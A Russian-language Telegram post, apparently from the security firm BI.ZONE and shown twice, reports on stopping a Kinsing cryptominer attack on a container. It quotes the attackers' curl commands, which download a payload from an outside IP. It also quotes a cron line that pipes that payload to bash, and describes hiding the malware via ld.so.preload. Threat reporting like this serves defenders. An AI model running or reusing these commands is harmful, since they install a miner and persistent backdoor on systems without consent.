Telegram Group & Telegram Channel
🥑 Атака майнера: защита контейнерной среды на практике

Чем популярнее становятся контейнеры, тем больше появляется угроз, связанных с уязвимостями этих сред.

Рассказываем, как мы остановили атаку кластера активности Resourceful Wolf. Она началась с эксплуатации уязвимости публичного веб-приложения, запущенного в контейнере.

Что сделали злоумышленники:

1. Загрузили с внешнего ресурса ПО для майнинга Kinsing:


curl -o /tmp/libsystem.so http://95.142.47[.]27/libsystem.so ; curl -o /tmp/kinsing http://95.142.47[.]27/kinsing


Kinsing — вредоносное ПО на основе Golang, которое используется для добычи криптовалюты на взломанном сервере. Обычно злоумышленники устанавливают этот майнер в контейнере, поэтому для защиты от подобного ВПО важно иметь под рукой решения или сервисы, позволяющие видеть происходящее в таких средах.

2. Закрепились через задачу Cron:

* * * * * curl http://95.142.47[.]27/kinsing | bash > /dev/null 2>&1


3. Попробовали скрыть вредоносную активность в системе — добавили в /etc/ld.so.preload вредоносную библиотеку /tmp/libsystem.so.

4. Удалили историю вводимых команд.

Команда BI.ZONE TDR остановила атаку. Мы изолировали скомпрометированный хост, проанализировали контейнер и предотвратили вредоносную активность.

BI.ZONE EDR в составе сервиса BI.ZONE TDR позволяет вести мониторинг событий в контейнерах, при необходимости обеспечивая активное реагирование на хостах. В результате удается защитить контейнерные среды от ВПО вроде майнера Kinsing.

Напишите нам, и мы проведем бесплатное пилотирование.
Please open Telegram to view this post
VIEW IN TELEGRAM



group-telegram.com/bizone_channel/1401
Create:
Last Update:

🥑 Атака майнера: защита контейнерной среды на практике

Чем популярнее становятся контейнеры, тем больше появляется угроз, связанных с уязвимостями этих сред.

Рассказываем, как мы остановили атаку кластера активности Resourceful Wolf. Она началась с эксплуатации уязвимости публичного веб-приложения, запущенного в контейнере.

Что сделали злоумышленники:

1. Загрузили с внешнего ресурса ПО для майнинга Kinsing:


curl -o /tmp/libsystem.so http://95.142.47[.]27/libsystem.so ; curl -o /tmp/kinsing http://95.142.47[.]27/kinsing


Kinsing — вредоносное ПО на основе Golang, которое используется для добычи криптовалюты на взломанном сервере. Обычно злоумышленники устанавливают этот майнер в контейнере, поэтому для защиты от подобного ВПО важно иметь под рукой решения или сервисы, позволяющие видеть происходящее в таких средах.

2. Закрепились через задачу Cron:

* * * * * curl http://95.142.47[.]27/kinsing | bash > /dev/null 2>&1


3. Попробовали скрыть вредоносную активность в системе — добавили в /etc/ld.so.preload вредоносную библиотеку /tmp/libsystem.so.

4. Удалили историю вводимых команд.

Команда BI.ZONE TDR остановила атаку. Мы изолировали скомпрометированный хост, проанализировали контейнер и предотвратили вредоносную активность.

BI.ZONE EDR в составе сервиса BI.ZONE TDR позволяет вести мониторинг событий в контейнерах, при необходимости обеспечивая активное реагирование на хостах. В результате удается защитить контейнерные среды от ВПО вроде майнера Kinsing.

Напишите нам, и мы проведем бесплатное пилотирование.

BY BI.ZONE




Share with your friend now:
group-telegram.com/bizone_channel/1401

View MORE
Open in Telegram


Telegram | DID YOU KNOW?

Date: |

Either way, Durov says that he withdrew his resignation but that he was ousted from his company anyway. Subsequently, control of the company was reportedly handed to oligarchs Alisher Usmanov and Igor Sechin, both allegedly close associates of Russian leader Vladimir Putin. However, the perpetrators of such frauds are now adopting new methods and technologies to defraud the investors. As the war in Ukraine rages, the messaging app Telegram has emerged as the go-to place for unfiltered live war updates for both Ukrainian refugees and increasingly isolated Russians alike. Elsewhere, version 8.6 of Telegram integrates the in-app camera option into the gallery, while a new navigation bar gives quick access to photos, files, location sharing, and more. Additionally, investors are often instructed to deposit monies into personal bank accounts of individuals who claim to represent a legitimate entity, and/or into an unrelated corporate account. To lend credence and to lure unsuspecting victims, perpetrators usually claim that their entity and/or the investment schemes are approved by financial authorities.
from nl


Telegram BI.ZONE
FROM American